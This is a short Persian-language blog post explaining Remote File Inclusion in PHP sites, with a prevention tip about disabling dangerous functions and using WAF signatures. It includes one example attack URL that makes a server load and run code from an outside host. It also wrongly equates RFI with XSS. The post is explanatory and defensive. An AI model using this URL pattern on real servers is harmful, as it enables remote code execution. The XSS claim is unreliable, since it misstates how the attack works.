Remote File Inclusion یا RFI چیست؟


images

Remote File Inclusion یا به اختصار RFI به هکرها اجازه می دهد تا به وسیله یک اسکریپت، اقدام به آپلود کد و فایلهای آلوده روی سرور کنند. این مورد در صورت وجود آسیب پذیری در سرور و یا وب سایت، به وسیله تزریق کد یا همان XSS انجام می گردد. در صورت وجود این آسیب پذیری، می تواند منجر به ارائه دسترسی Deface سایت، دسترسی اجرای دستورات و در نتیجه دسترسی shell گردد.

به طور مثال دستور زیر می تواند یک کد را از طریق URL در سرور اجرا نماید.

http://example.something/index.php?page=http://url/file.txt

توجه داشته باشید که کد مخرب در فایل متنی نوشته می شود. این مورد معمولا با غیر فعال نمودن توابع خطرناک php نظیر system و exec و … قابل پیشگیری است. ولی جهت امنیت بالاتر، می بایست از Signature های تشخیص حملات RFI در WAF های نرم افزاری/سخت افزاری استفاده نمود.

  • برچسب ها:
  • RFI
میلاد خوشدل

در حوزه‌ی امنیت وب و شبکه فعالیت می کند، عاشق پارکور است و مدیریت دیتاسنتر، امن سازی شبکه های مخابراتی و کابلی و برنامه نویسی وب و موبایل از تجارب کاری او می باشد. او در حال حاضر بنیانگذار ریجاکس است.

نظر خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد.

3 × چهار =


تگ های html مجاز به استفاده می باشند: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

ارسال یک پیام